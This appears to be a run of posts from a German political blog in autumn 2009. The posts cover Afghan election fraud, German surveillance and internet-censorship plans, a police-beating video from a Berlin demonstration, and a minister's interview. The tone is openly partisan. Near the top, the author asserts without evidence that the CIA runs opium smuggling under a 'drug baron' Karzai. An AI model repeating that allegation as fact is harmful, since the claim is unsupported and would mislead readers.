“At other critical stages in the election process,” he wrote in The Washington Post, “I was similarly ordered not to pursue the issue of fraud.
Das geht ja auch nicht. Karzai ist unser Freund in der Region. Nur unter dem Drogenbaron Karzai kann die CIA ungestört ihrem Opiumschmuggel nachgehen, die Taliban hat damals als erste Amtshandlung den Opiumanbau komplett gestoppt. Und heute baut Afghanistan mehr Opium an, als man für das Decken des Weltbedarfes braucht.
Die Geschichte ist auch eine schöne Dokumentation, wie man so eine Wahl krude und plump umbiegt:
“My staff collected evidence on hundreds of cases of fraud around the country and, more important, gathered information on turnout in key southern provinces where few voters showed up but large numbers of votes were being reported. Eide ordered us not to share this data with anyone, including the Electoral Complaints Commission, a UN-backed Afghan institution legally mandated to investigate fraud.”
Die Südprovinzen sind die, wo sich die Bundeswehr nicht hintraut, weil die schon so vollständig an "die Aufständischen" gefallen sind. Kein Wunder, dass da kaum jemand wählen geht. Da muss man um Leib und Leben fürchten auf dem Weg zur Wahlurne. Um so erstaunlicher, dass die dort herrschenden Warlords nicht selber die Wahl manipuliert haben. Oder vielleicht haben sie ja, aber die Urnen wurden auf dem Weg in die Hauptstadt nochmal ausgetauscht.

Fri Oct 2 2009

[l] Das BKA hat die Internetzensur-Richtlinie zur Verschlusssache gemacht, um Manipulationen zu verhindern. Nicht etwa weil der Inhalt verfassungswidrig ist und die Presse an ihrer Arbeit gehindert werden sollte. Ach SOO ist das. Nee, klar.
Offensichtlich ist der Ziercke intellektuell mit dem Unterschied zwischen Signieren und Verschlüsseln überfordert. Ich bin ja immer wieder erschüttert, dass so jemand in diesem Land überhaupt eine Position in einer technisch anspruchsvollen Umgebung erhalten kann. Hartz IV ist noch zu schade für den.

Sun Sep 27 2009

[l] Der Erdgeist hat mal einen Graphen aus dem Wahlergebnis gemacht, und so betrachtet sieht das gar nicht mehr so schlimm aus.

Fri Sep 25 2009

[l] Schäuble-Wunschzettel rechtzeitig zur Wahl geleakt.
Dem Schriftstück zufolge soll auch der Verfassungsschutz wie das Bundeskriminalamt künftig Computer online durchsuchen dürfen und auf die Daten der Vorratsdatenspeicherung zugreifen dürfen. Auch sollen dem Verfassungsschutz Lausch- und Spähangriffe in Privatwohnungen erlaubt werden. Der bislang auf Straftaten von erheblicher Bedeutung beschränkte genetische Fingerabdruck soll die erkennungsdienstliche Standardmaßnahme werden. Mit diesen Forderungen bereite sich das Innenministerium auf die Koalitionsverhandlungen nach der Bundestagswahl vor, berichtet die Zeitung.
Und hier ist die Süddeutsche dazu. Besonders heftig:
Den Sicherheitsbehörden soll darüber hinaus die Infiltration im kriminellen und verfassungsfeindlichen Milieu erleichtert werden. Verdeckte Ermittler sollen, wenn sie Straftaten begehen und diese zum "szenetypischem Verhalten" gehören, nicht bestraft werden.
Tolle Wurst. Als ob wir noch nicht genug Kriminelle außerhalb des "Verfassungsschutzes" haben.
Update: Mal ein paar Gedanken dazu. Ich halte das für eine Nebelkerze. Hauptsächlich weil ich mir sicher bin, dass der Verfassungsschutz das eh schon alles tut. Das ist ein nicht kontrollierbarer Geheimdienstmoloch ohne eine das Wort verdient habende Aufsicht.
Aber, mal zum mentalen Abgleich: bei meinen Freunden aus dem Osten kommt das wie folgt an:
Also fassen wir mal zusammen. Wir werden demnächst eine Regierung haben, die mit einer verfassungswidrig zustandegekommenen Mehrheit regiert, eine Gestapo einrichten will und DNA-Proben bei jeglichem Kontakt mit der Polizei nehmen will.
Und völlig von der Hand zu weisen ist das ja nicht.
Update: Ich frage mich ja gerade, ob die das BKA-Gesetz nur gemacht haben, damit sie am Ende die Befugnisse dem Verfassungsschutz geben können. Denn wenn der Verfassungsschutz das alles darf und dann auch die Polizei informieren darf, wozu brauchen wie dann noch das BKA? Für die Alternativtheorie zitiere ich mal meinen Freund Frank:
Ich glaube ja, dass Schäuble das alte SD vs. Gestapo Modell wieder will. Wenn man mächtige Sicherheitsbehörden errichtet, braucht man davon zwei, damit die sich gegenseitig in Schach halten, während sie die Bevölkerung niederhalten.
Das ist in jeder Diktatur der Welt so, auch gerne mal mehrere, wenn das mit der örtlichen Stammespolitik erforderlich ist.
Update: Sehr schönes Zitat dazu bei Heise:
"Das ist eine einzige Aufforderung, bloß nicht CDU/CSU zu wählen", grantelte ein ranghoher Polizeibeamter gegenüber heise online.
In der Tat. Wählt bloß nicht CDU/CSU!

Mon Sep 21 2009

[l] Die Konservativen in England wittern Morgenluft und wollen mit einem Abbau des Überwachungsstaates beim Wähler punkten. Das PDF-Paper dazu geht deutlich weiter als die Webseite:
- Fewer – not more – giant central government databases.
- Fewer personal details, accurately recorded and held only by specific authorities - on a need-to-know basis only, and for limited periods of time.
- Wherever possible, personal data will be controlled by individual citizens, who have the power to decide which agencies can access or modify this information.
- Greater checks on data-sharing between government departments, quangos and local councils.
- Stronger duties on government to keep the private information it gathers safe.
Das darf man nicht vergessen, dass dieser ganze Überwachungsdreck in England von Labour gemacht wurde, also von den Linken! Links wählen hilft keinesfalls automatisch vor Überwachungsstaat und Abbau der Bürgerrechte. (Danke, Klaus)

Sat Sep 19 2009

[l] Spannend: die Berliner Polizei ist zum 1. Mai mit einer Gasgranate angegriffen worden, von der alle möglichen Medien gerade schreiben, es sei analysiert worden, aber außer der Bild sagt keiner, was denn da nun rausgekommen ist. Hier ist der Bild-Bericht mit Foto der Granate. Bei der Bild muss man ja immer vorsichtig sein, insofern: Vorsicht! :-)
Aber die Details klingen finster:
Jetzt liegt das Untersuchungsergebnis vor: Der Sprengsatz war eine britische Militär-Granate! Wegen der starken Wirkung wurde sie für das Militär zur Bekämpfung von Aufständen und sogar für Anti-Terror-Einsätze entwickelt.
Das klingt schon ziemlich heftig, die Wirkung dieser Granaten. Dass die Polizei sich übergeben mußte und nur kriechend fortbewegen konnte, das schreiben auch diverse andere Zeitungen, das kommt vermutlich aus einer Presseerklärung der Polizei.
Ich finde an Geschichten wie dieser immer spannend, wie die Leute das dann für ihre Agenda nutzen wollen:
Der Landeschef der Deutschen Polizeigewerkschaft, Bodo Pfalzgraf (46), ist empört: „Wenn jetzt zum 1. Mai schon Militärgranaten auf Bürger und Polizisten geworfen werden, ist die Schwelle zum Terrorismus endgültig erreicht. Solche Typen haben ihr Grundrecht auf Versammlungsfreiheit längst verwirkt. Die Politik muss erkennen, dass nichts mehr schönzureden ist.“
Man hätte ja auch umgekehrt reagieren und den Einsatz von Reiz- und Giftgas gegen Menschen generell verbieten können. Aber nein, wenn die Polizei das macht, dann ist das OK, aber wenn mal ein Demonstrant mit sowas wirft, dann ist das "eine neue Qualität linker Gewalt gegen Polizisten". Das ist ja eine glatte Lüge, dass Riot Control Gear nur für das Militär gemacht wird oder nur im Ausland eingesetzt wird. Da könnt ihr mal eure Rente drauf verwetten, dass die solches Zeug beim nächsten G8-Gipfel gegen Demonstranten einsetzen werden. Und selbst wenn das nur für das Ausland wäre — macht es das besser?!
Oh und, hier ist die Symptombeschreibung beim ehemaligen Nachrichtenmagazin:
Die Polizisten hätten Reizungen der Augen und Gesichtsschleimhäute erlitten sowie über Übelkeit und Schwindelgefühle geklagt, sagte Neuendorf. Sie hätten jedoch den Einsatz nicht abgebrochen. Auch habe keiner von ihnen die angebotene ärztliche Nachsorge in Anspruch genommen.
Wisst ihr, wie das klingt? Wie ganz normales Tränengas. Mit dem die Polizei seit Jahren Demonstranten beschießt.

Tue Sep 15 2009

[l] Oha, wer hätte gedacht, dass die Tagesschau eine subversive CDU-Bashing-Site wird? Guckt mal bei diesem Video von 3:24 bis 3:29 genau hin. Ich habe mal einen Screenshot gemacht. Falls es jemand nicht sieht: unten, der Slogan auf dem CDU-Plakat in der Mitte, kommt so vermutlich nicht direkt von der CDU. (Danke, Kai)
[l] Der Prügelpolizei-Fall entwickelt sich gerade, wie es leider zu erwarten war. Erst hieß es, die Polizisten seien suspendiert, dann hieß es, die Polizisten würden in den Innendienst versetzt. Jetzt heißt es, der Polizist (Einzahl!) würde seine Einheit verlassen. Man sieht mindestens zwei weitere Polizisten bei Übergriffen. Da wird unser Anwalt wohl noch mal kräftig nachhaken müssen.
Im Übrigen kursiert gerade das Gerücht, die Polizei würde mit dem Recht am eigenen Bild die Videos aus dem Netz klagen wollen. Ich weiß nicht, ob da was dran ist, ursprünglich kommt das offenbar vom Tagesspiegel. Bei dem CCC und mir ist noch nichts davon zu sehen. Das wäre auch aus mehreren Gründen nicht sehr schlau. Erstens halten sie damit die Geschichte in den Medien, zweitens überwiegt bei solchen Prügelexzessen das öffentliche Interesse, und drittens gibt es da diesen alten weisen Spruch:
Trying to remove information from the Internet is like fishing piss out of the swimming pool.
Wir als CCC haben uns ja angesichts früherer Fälle sehr frühzeitig entschieden, das Video ins Internet zu stellen und möglichst dezentral zu lagern, damit das nicht beschlagnahmt werden und dann in der Asservatenkammer "beschädigt" werden kann.
Oh übrigens, um euch mal einen Eindruck zu geben, wie gruselig der Corpsgeist bei der Polizei ist: ich habe da bisher extra nicht drauf gelinkt, aber es gibt ein öffentlich einsehbares Polizei-Webforum, in dem gar kraftvolle Statements zu dem Video veröffentlicht wurden. Hier hat mal einer ein Best-Of gemacht. Das Forum selbst hat den Thread inzwischen gesperrt und will ausmisten.
Zum Abschluß möchte ich nochmal einen Satz aus dem Feuilleton der Frankfurter Rundschau zitieren:
Das ZDF etwa hatte am Abend vor dem Schanzenfest in Hamburg seine Zuschauer schon mal darauf eingestimmt, dass es dort garantiert Randale geben werde. Wenn sie im Iran Demonstrationen mit Handys filmen, erfahren die Filmchen im TV eine wesentlich größere Würdigung als bei Kundgebungen im eigenen Lande.
So sieht das aus!
Update: Vielleicht ist es doch nicht so schlimm, wie es gerade aussieht. Der RBB (ARD Berlin Brandenburg) berichtet:
Nach dem Übergriff auf einen Demonstranten während einer Datenschutz-Demonstration prüft die Berliner Polizei, ob mehr Beamte daran beteiligt waren als bisher bekannt. Derzeit richten sich die Ermittlungen des Landeskriminalamtes gegen zwei Polizisten wegen Körperverletzung im Amt. Die Auswertung von Polizeivideos soll Aufschluss geben, ob weitere Beamte tatverdächtig sind, hieß es am Dienstag.
Wir werden dafür sorgen, dass sie mehr als nur die Polizeivideos auswerten. Weiter unten dann:
Nach Angaben von Berlins Polizeipräsident Dieter Glietsch bekommen die Beamten ab kommendem Jahr zusammen mit den neuen blauen Uniformen ein Namens- und Nummernschild, das sichtbar getragen werden muss. Seit sechs Jahren läuft bereits ein Pilotprojekt mit 10.000 Namensschildern. Doch die wenigsten Beamten trügen sie, weil sie Repressalien fürchteten, sagte Glietsch.
Soso, Repressalien. In Hamburg gibt es ja auch eine Polizisten-ID, aber die wird in den Fällen nicht getragen, wenn die Polizisten in Riot Gear von möglicher Gewalt ausgehen, also genau dann wenn man sie gebraucht hätte. Aber selbst wenn die in Berlin eine Polizei-ID einführen, sollten wir trotzdem auf eine bundesweit einheitliche hinarbeiten, weil sonst ja immer noch Polizisten aus Bayern oder sonstwo in Amtshilfe in Berlin unerkannt herumprügeln könnten.
[l] In Frankreich kann man gut sehen, wie vertrauenswürdig Aussagen von Politikern sind, niemand habe vor, Internetzensurinfrastruktur zum Zensieren des Internets zu benutzen. Ich kann nicht gut Französisch, deshalb gebe ich mal die Zusammenfassung des Einsenders wieder: der Innenminister Brice Hortefeux (auf dem Bild oben zu sehen) hat vor laufenden Kameras einen rassistischen Witz gemacht ("Einen Araber braucht man immer, aber sobald man mehr hat gibt es Probleme"), dessen Video natürlich sofort massiv im Internet die Runde gemacht hat. Das hier scheint das Video zu sein.
Und jetzt gibt es da natürlich Heulen und Zähneknirschen bei den Politikern, dass das seine Persönlichkeitsrechte verletzen würde, und man da dringend was gegen tun müsse. Internetzensur ist in Frankreich Teil des LOPPSI-Paketes, das demnächst verabschieden werden soll.
So und jetzt ratet mal, mit welchem dummen Spruch sie jetzt begründen? Kommt ihr nie drauf!
Henri Guaino, conseiller de Nicolas Sarkozy, estimant lui sur France Info que «Internet ne peut être la seule zone de non-droit, de non-morale de la société, la seule zone où aucune des valeurs habituelles qui permettent de vivre ensemble ne soient acceptées».
"zone de non-droit" heißt "rechtsfreier Raum". Den Rest könnt ihr euch wahrscheinlich denken.
Also, Freunde, falls unsere Politiker euch mal wieder versichern, dass niemand vorhabe, die Zensur-Infrastruktur zur Zensur zu benutzen: glaubt ihnen kein Wort.
Update: Inzwischen kommen ein paar bessere Übersetzungen rein, ich zitiere mal eine:
Henri Guaino, Berater von Nicolas Sarkozy, meinte auf France Info, daß "das Internet nicht der einzige rechtsfreie, von gesellschaftlicher Moral befreite Raum, nicht der einzige Raum sein könne, wo die üblichen Werte, die ein Zusammenleben ermöglichen, nicht akzeptiert werden."
Mhh, das trieft ja geradezu vor Moral und Anstand! Und weiter:
Als erstes (auch: vorrangiges) Argument entwickelt: B. Hortefeux hat "nichts von einem Rassisten", das ist ein "Humanist" (…) mit sozial- katholischer Herkunft.
Ein CDU-Mann, also. (Danke, Attie)
[l] Noch ein kurzes Update zu den Prügelpolizisten:
Auch der Bundestagsabgeordnete Hans-Christian Ströbele (Grüne), der bei der Demo mitlief, sammelt Beweise. Einen Zeugen fand er in seinem Umfeld: Ein Mitarbeiter der Grünen-Bundestagsfraktion habe das Geschehen aus einem Café beobachtet. "Als er dann dort hineilte", sagte Ströbele der FR, "ist er selber zu Boden gestoßen worden." Er werde sich die Ermittlungsergebnisse der Polizei genau ansehen und gegebenenfalls entsprechende Beweise vorlegen. "Wir haben da immer wieder schlechte Erfahrungen gemacht."
Der weiß, wovon er redet. Der hat jahrelang Menschen anwaltlich gegen die Polizei vertreten.

Mon Sep 14 2009

[l] Wow, jetzt berichtet auch schon die Deutsche Welle über die Prügelpolizei. Der Kontrast zum letzten Jahr könnte nicht größer sein, wo die (wenn es hoch kommt) Minute Tagesschau-Coverage zu über der Hälfte mit "Am Rande haben sich Randalierer Gefechte mit der Polizei geliefert" dominiert wurde, und dieses Jahr schreiben sie alle, die Polizei habe Demonstranten geprügelt.
Ich glaube ja, wir haben hier die Chance, ein echtes Umdenken einzuleiten. Viel zu leicht haben sich die meisten (ich eingeschlossen) das bisher gemacht, wenn es nach Fußballspielen oder Demonstrationen hieß, einzelne Randalierer hätten sich mit der Polizei geprügelt. Da war für die meisten klar: na die Randalierer werden angefangen haben, und die Polizei hat dann ihren Job getan. Und dieses Herangehen führt auch zu einer Vorverurteilung von Betroffenen, die vor Gericht ohnehin wenig zu lachen haben, wie man hier bei annalist gut nachlesen kann, wenn ihnen noch eine Anzeige wegen Falschaussage vor Gericht reingedrückt wird, wenn sie sich gegen Randale-Vorwürfe oder Polizeibrutalität zu wehren versuchen.
Ich hoffe, dass wir das mit der bundesweiten Polizeikennzeichnung hinkriegen. Letztlich ist das ja auch im Interesse der Polizei, wenn solche schwarzen Schafe erkannt und zu Schreibtischjobs abkommandiert werden, anstatt weiter das Ansehen der Polizei zu beschädigen. Leider ist der Petitionsentwurf, der da gerade kursiert, nicht zielführend, weil Polizei Ländersache ist. Das ist ja gerade einer der Gründe, wieso wir das Internetzensurgesetz für einen Verfassungsbruch halten, weil es auf Bundesebene Polizeidinge regeln will.
Aber wir haben hier die Chance, eine Umkehr der Schuldannahme herbei zu führen. Die Statistik ist da nämlich eindeutig: Für 2004: 811 Strafermittlungsverfahren wegen Körperverletzung im Amt, nur 24 Disziplinarverfahren eingeleitet, demgegenüber stehen 4719 Verfahren in die Gegenrichtung wegen Widerstandes gegen Vollstreckungsbeamte (der andere Klassiker ist, wie ich mir habe sagen lassen, schwerer Landfriedensbruch, wobei dann schon auch mal ein Fahrrad als mögliche Waffe ausgelegt wird). Oh und diese Zahlen waren nur für Berlin. So sieht das regelmäßig aus in der Statistik. Praktisch alle Verfahren gegen Polizisten werden eingestellt oder führen zu keiner Sanktion. Und als bürgerliches Mittelstandskind will man ja auch annehmen, dass das so mit rechten Dingen zugeht, und die Polizei vorbildlich niemals jemanden angreifen würde. Mein Glauben daran, dass das so ist, hat sich in den letzten Jahren leider deutlich gemindert.

Sat Sep 12 2009

[l] Die Tagesschau hat ja schon berichtet, dass es am Rande der Demo zu Rangeleien kam. Nun, wir haben da zufällig ein Video gemacht. Man sieht sehr schön, dass die Polizei spontan einen unauffälligen Passanten zu verprügeln anfängt, und sich dann auch ein paar anderen harmlosen Passanten vergreift. LEIDER haben die Polizisten IMMER NOCH NICHT eine Identifikationsnummer für solche Fälle, das ist die schlechte Nachricht. Die gute ist, dass wir Nerds inzwischen HD-Camcorder haben und man aus dem 720p-Video (Achtung: knapp 250 MB) ein paar schöne Frames extrahieren kann, die für eine Identifizierung der Prügel-Cops ausreichen sollten. Ich finde es eine Schande, dass die Polizei nicht mal ein paar Stunden während so einer Demo ihr Testosteron unter Kontrolle halten kann.
Auslöser war übrigens, dass der Radfahrer eine Anzeige gegen einen anderen Polizisten erstatten wollte, weil er gesehen hatte, wie ein Freund von ihm unsanft einkassiert wurde.
Ich hab das Video auch noch mal runterkomprimiert, für Leute mit weniger Bandbreite: Polizeiprügelvideo in 768x432, H.264 mit MP3, 58 MB.
Und für Firefox-User und zum Standard-Setzen als Theora+Vorbis im video-Tag (62 MB).
Update: $KUMPEL bittet mich gerade, zur Illustration noch dieses inhaltlich verwandte Bild zu verlinken :-)
Update: Wir haben das dicke Video auch noch mal auf media.ccc.de abgelegt.
Update: Ich sollte vielleicht noch erwähnen, dass ich das Video nicht geschossen habe, das war jemand aus dem CCC Berlin Umfeld. Ich hab es nur runterkomprimiert. Falls jetzt ein Spezialexperte der Staatsanwaltschaft meint, meinen Server als Beweismittel mitnehmen zu müssen: guckt mal genau hin, das liegt gar nicht auf meinem Server (lag da auch nie).
Update: Youtube (macht noch processing, aber man kann schon gucken)
Update: Der CCC wird da jetzt mal ein Exempel statuieren. Das geht ja wohl nicht, dass die auf unserer Demo unsere Besucher verprügeln. Also: Zeugen: bitte melden! An mail (at) ccc.de. Oh und wenn die Zeugen Videos gemacht haben, auf denen man was erkennen kann, dann hebt die mal bitte schön auf und schickt sie uns.
Update: Oh Mann, jetzt hat irgendein Armleuchter das Youtube-Video geflagt und Youtube will jetzt Anmeldung und Altersverifikation haben, damit man das gucken kann. NARF! Hier hat es auch jemand anderes bei Youtube hinterlegt. Und ich habe noch eine Youtube-Format-Version des OGV für Firefox gemacht. Stellt euch mal vor, wenn jemand die ganzen Polizeivideos aus dem Iran geflagt hatte. Ganz toll, liebe Youtube-Flagger.
Update: Wir fummeln gerade noch, unter welcher Creative Commons wir das rausgeben. Presse, die das verwenden möchte, ist dazu herzlich eingeladen und möge sich zur Klärung der Details unter presse (at) ccc.de melden.
Update: Die Theora-Videos sind auf einen anderen Rechner mit 100 MBit Anbindung umgezogen, sollten jetzt fixer gehen. :-(
Update: Jetzt auch bei basedrive.org, und Leute laufen gerade rum und laden das wild bei youtube, vimeo und so weiter hoch. Weitermachen!
Update: Jemand hat ein Torrent daraus gemacht.
Update: Die taz linkt auf mich und hat sogar ihre Überschrift geändert.
Update: Weil ein paar fragten: Die Nummern auf dem Rücken, das ist die Einheit, nicht die Person. Und bisher läuft das vor Gericht immer so, dass die Polizisten sich dann nicht gegenseitig belasten, auch nicht mit "also ich war es nicht", und dann kann nicht festgestellt werden, wer es genau war, und es gibt Freispruch für alle. Daher ist das ja so erfreulich, dass man auf unserem Video die Gesichter sehen kann.
Update: Vimeo.
Update: Die Zeit. Und dann ist da noch ein separates Foto von der Verhaftung für den Gesichtsabgleich aufgetaucht. Die Morgenpost twittert, dass die Berliner Polizei eine Stellungnahme zu dem Video angekündigt hat. Auf der Kölner Stadt-Anzeiger hat eine Meldung dazu.
Update: Stellt sich raus, dass man geflagte Youtube-Videos ohne Einloggen mit Kommentaren gucken kann, indem man kickyoutube.com substituiert. Guter Service!
Update: Der Tagesspiegel schreibt:
Derzeit untersucht die Berliner Polizei noch die genaueren Umstände. Nach Tagesspiegel-Informationen soll aber ein Verfahren gegen mindestens zwei Polizeibeamte wegen Körperverletzung im Amt eingeleitet werden.
*STRIKE*
Update: Hier sammelt noch jemand fleissig und ich übernehme mal von dort: eine Strafanzeige wurde gestellt (runterscrollen).
Update: Das ehemalige Nachrichtenmagazin springt auf den Zug auf und linkt auf mich! Sie haben die Fakten ein bisschen durcheinandergebracht, aber haben folgendes lustige Detail:
Die Berliner Polizei kündigte für Sonntagnachmittag, 15 Uhr eine Stellungnahme zu dem Vorfall an - bis 16 Uhr war keine erschienen. Auf Anfrage hieß es, der Kommentar verzögere sich.
Also das klingt ja für mich so, als riefe da alle zwei Minuten die DPA an, bei der Polizei, wie das denn mit der Stellungnahme sei :-) Wahrscheinlich brennt da gerade die Luft.
Update: Presseerklärung der Polizei:
Die Vorgehensweise der an der Festnahme beteiligten Beamten einer Einsatzhundertschaft, die auch in einer im Internet verbreiteten Videosequenz erkennbar ist, hat die Polizei veranlasst, ein Strafverfahren wegen Körperverletzung im Amt einzuleiten. Das Ermittlungsverfahren wird durch das zuständige Fachdezernat beim Landeskriminalamt mit Vorrang geführt.
Update: Das Video hat es über den großen Teich geschafft.
Update: n-tv hat auch was.
Update: Jetzt ist es auch bei der ARD und Sat.1 im Videotext, damit haben wir die Generation 40+ erschlossen :-)
Update: Einer der Betroffenen aus dem Video hat eine Gegendarstellung zur Pressemitteilung der Polizei veröffentlicht.
Update: Rheinische Post, DPA und damit sogar die Springer-Presse berichten!
Update: Tagesspiegel und sogar die BZ (die Berliner "Bild"-Konkurrenz) hat was. Und weil gerade Wahlkampf ist, haben auch alle "Innenexperten" eine Position dazu :-)
Update: Lief jetzt im Fernsehen, bei RBB (ARD) in der Abendschau, den Lokalnachrichten, und bei RTL. Mainstreamiger geht es wohl nicht.
Update: NEIN!!!! Die "Bild" hat einen Bericht! "Video zeigt: Polizeibeamte prügeln auf Demonstranten ein". Da mache ich mal eine Ausnahme und linke drauf. Und die Frankfurter Rundschau hat einen Kommentar.
[l] Ah, was für ein Tag. Komme gerade von der Demo zurück. Mein Schild hatte dieses Jahr die Aufschrift "Wo bleibt eigentlich die Revolution" :-)
Das war auch offensichtlich genug, dass mich so ca 20 Leute ansprachen "hey, du bist doch Fefe, oder" und drei Mal hatte ich ein "guck mal, der Typ da, das ist Fefe". Fühle mich wie ein Popstar!1!!
Ich hatte dann auch endlich mal Gelegenheit, Franziska und Andrej die Hand zu schütteln. War sehr nett. Die kraftvollste Rede kam wie üblich von Monty von der Hedonistischen Internationale, der seine drei Minuten für eine ausgiebige Publikumsbeschimpfung genutzt hat, dass die ganzen Datenschutzkämpfer dann ihre Fotos mit Namen und GPS-Koordinaten getagt bei Google oder Yahoo hochladen. Monty rockt!!
Die Piratenpartei hat ziemlich den Eindruck dominiert, die hatten da einen fetten 15-Tonnen-Laster am Start, den sie zweistöckig ausgebaut haben und wo dann raubkopierte Prodigy-mp3s aus den frühen 90er Jahren gespielt haben, was beim Publikum gut eingeschlagen hat. Ich wollte hier schon spekulieren, dass die Musik von 1994 eine Konkretisierung der Vorstellungen der Piratenpartei ist, nach wie vielen Jahren Musik-Urheberrecht in Zukunft auslaufen soll, aber habe dann von der Demo-Projektleitung das folgende, noch viel peinlichere Detail erfahren: die Demo hat ein paar tausend Euro an die GEMA abgedrückt, damit sie Musik spielen dürfen, und da hat die Piratenpartei sich auch beteiligt. D.h. die Piraten haben das angeblich abzuschaffende Establishment finanziell unterstützt!1!! Das muss ein witziger Moment gewesen sein für die Projektleitung, als sie die Piratenpartei nach ihrem GEMA-Beitrag gefragt haben…
Update: Also eine Sache muss ich ja noch dazu sagen: es ist auffällig, dass es weniger Leute mit eigenen Ideen und mehr Mitläufer werden. Statt eigener Transparente und Sprüche gab es bei vielen Piraten einfach nur Parteifahnen-Gewedel und bei den Grünen hauptsächlich Luftballons mit einer Schäublone drauf. Die Grünen haben da virtuellen Boden gutgemacht, indem sie offenbar kostenlos leere Grünen-Transparente mit dickem Filzstift dabei hatten und an die Leute verteilt haben, die dann da ihre Kreativität niedergeschrieben haben und damit rumliefen und wie Grüne aussahen. Viele von denen liefen aber weit ab des Grünensegmentes herum, daher vermute ich mal, dass die meisten von denen gar keine Grünen waren. Besonders bizarr fand ich ja, dass die Verräterpartei ein paar Jusos vorbei geschickt hatte.
Es gab da noch einen lustigen Fnord am Anfang, als die DPA versehentlich die "Ich will aber auch!1!!"-Trotzdemo von Herrn Remmert-Fontes für unsere Demo hielt und was von "immerhin schon 50 Demonstranten" geschrieben haben sollen. Habe ich aus zweiter Hand, kann also auch eine Ente sein. Man sagte mir, die Meldung sei inzwischen zurückgerufen.
Update: Der AK Vorrat sammelt einen Pressespiegel im Wiki.

Fri Sep 11 2009

[l] Putin macht dann wohl ab 2012 als Präsident weiter. War ja auch irgendwie klar.
Speaking to a group of scholars and international journalists, Putin said that he and his successor, Dmitry Medvedev, would take a joint decision over which one of them would hold the post next. Putin stepped down as president in 2008, becoming Russia's prime minister, installing Medvedev in his place.
Wobei ich ja ehrlich gesagt finde, dass der Medwedjew das gar nicht schlecht gemacht hat. So richtige Griffe ins Klo hat der sich nicht geleistet. Wahrscheinlich war er dazu auch zu sehr an Putins kurzer Leine :-) (Danke, Ian)

Thu Sep 10 2009

[l] Die Zypries hat der taz ein Interview gegeben, bei dem sich die Balken nur so biegen. Ich kann da gar keinen besonders schlimmen Teil rausgreifen, weil das nur so ein Feuerwerk an schlimmen Teilen ist. Zypries ist eingeschnappt, dass wir nicht mehr mit ihr reden wollen, weil sie das Zensurgesetz gemacht hat, obwohl wir ihr alle Argumente dagegen in die Hand gegeben haben. Zypries ist eingeschnappt, dass die Leute die Piratenpartei der SPD vorziehen, obwohl sie bei den Piraten keine Position zu "Arbeitsmarkt, Chancengerechtigkeit, Wirtschafts- und Finanzkrise" hat.
Was war noch gleich das SPD-Modell dazu? Arbeitsmarkt? Hat die SPD mit Ein-Euro-Jobs und Hartz IV nachhaltig zerstört. Chancengerechtigkeit ist ein übelkeitserregender Neocon-Kampfbegriff, mit dessen Benutzung sie sich krass demaskiert hat, wahrscheinlich ohne es zu merken. Chancengerechtigkeit sagt nämlich, dass die Leute nicht ein Recht auf gutes Leben haben müssen, sondern nur die Chance auf gutes Leben, d.h. wenn man jedem ein Lotterielos in die Hand drückt, hat man Chancengerechtigkeit, und das ist ja auch genau das, was INSM und ihre Jünger gerne erreichen wollen. Die Leute sollen alle arm gehalten werden, aber mit Taschenspielertricks wie "Chancengerechtigkeit" verarscht man sich hinreichend, dass sie das mit sich machen lassen. Und die Wirtschaftskrise hat die SPD ja auch hervorragend in den Sand gesetzt mit ihrer Bankenrettung und der resultierenden Monsterverschuldung für jeden von uns. Wenn ich mir das mal so angucken, dann wäre in jedem dieser Punkte kein Programm besser gewesen als das SPD-Programm.
Aber weiter im Text. Da kommen dann so Höhepunkte wie
Ja, selbstverständlich nehme ich die Sorgen der Internetgemeinde sehr ernst. Ich habe das immer getan und auch öffentlich deutlich gemacht. Ich befinde mich konstant im Dialog mit Vertretern der Internetgemeinde.
und
Aber wenn ich etwas politisch für richtig halte, dann kann ich das nicht fallen lassen, weil eine bestimmte Gruppe der Internetnutzer droht, eine andere Partei zu wählen. Das hätte mit konsequenter und geradliniger Politik nichts zu tun.
Aha, das Einführen von Internetzensur ist also konsequent und geradlinig. Mit anderen Worten: die Langzeitstrategie der SPD kulminiert zwangsläufig in der Einführung von Zensur. Das ist ja mal eine starke Aussage. Ich gebe ihr natürlich vollumfänglich Recht an der Stelle, bezweifle aber, dass sie verstanden hat, was sie da gerade zugegeben hat.
Oh und noch eine schöne "beleidigte Leberwurst" Stelle:
Und es ist ja nicht so, dass wir nicht mit den Kritikern der Internetsperren geredet hätten. Ihre Argumente sind berücksichtigt worden, wir haben die Regelung eng ausgestaltet, Rechtsschutz eingebaut und das Ganze auf drei Jahre befristet. Zur Wahrhaftigkeit im politischen Diskurs würde es gehören, das auch anzuerkennen.
HAHAHAHA, oh und wie wir das anerkannt haben. Keiner von uns hat vergessen, dass Frau Zypries persönlich an dem Gesetz geschrieben hat, dass in Deutschland die Internetzensur eingeführt hat. Eines der dunkelsten Kapitel der deutschen Nachkriegsgeschichte. Wie könnte das irgendjemand vergessen! Nein nein, Frau Zypries, keine Sorge, das vergessen wir Ihnen nicht. Naja lest mal selber, ein Höhepunkt jagt den nächsten. Sie gibt auch noch zu, dass die CDU mit ihrer stumpfen Proleten-Rhetorik sie zu dem Gesetz getrieben hat. Oh und die Provider waren Schuld, denn wenn die sich nicht die Verträge hätten aufzwingen lassen, hätte sie kein Gesetz machen müssen, um das zu legalisieren. Unfaßbar.
Oh und sie tritt für eine Selbstregulierung des Internets ein. Die Länder sollen sich verpflichten, für ein sauberes Internet zu sorgen! Als Vorbild nennt sie den Großvater aller vollständig verkackten Initiativen, das Kyoto-Protokoll! Harharhar.
Selbstverpflichtungen sind besser als ihr Ruf!
Bwahahaha, das tragische ist ja, dass man den Eindruck hat, sie meint das wirklich alles so. Selbstverpflichtungen sind nicht das Papier wert, auf dem sie stehen. Das macht man nur aus Wahlkampfgründen, damit man sagen kann, man habe etwas getan.
Oh und dann sagt sie, wieso die Piraten keine Chance haben:
Es reicht nicht, wenn sich die Programmatik einer Partei darin erschöpft, einem Lebensgefühl Ausdruck zu verleihen nach dem Motto: wir sind jung, wir kennen das Netz und ihr Alten versteht davon nichts. Was die Piratenpartei zudem von den Grünen in ihren Anfängen unterscheidet: Ihr fehlen die Galionsfiguren mit politischem Profil, wie beispielsweise Otto Schily oder Joschka Fischer.
Da hat sich ja die richtigen Knalltüten rausgesucht. Joschka Fischer ist so überassimiliert, dass er mit Anzug und Schlips rumrennt, Deutschland zurück in den Krieg geführt hat, und ein Pipelineprojekt für die Energiemafia managed, und Otto Schily ist zur SPD gewechselt, wo er dann CDU-Politik gemacht hat.

Thu Sep 3 2009

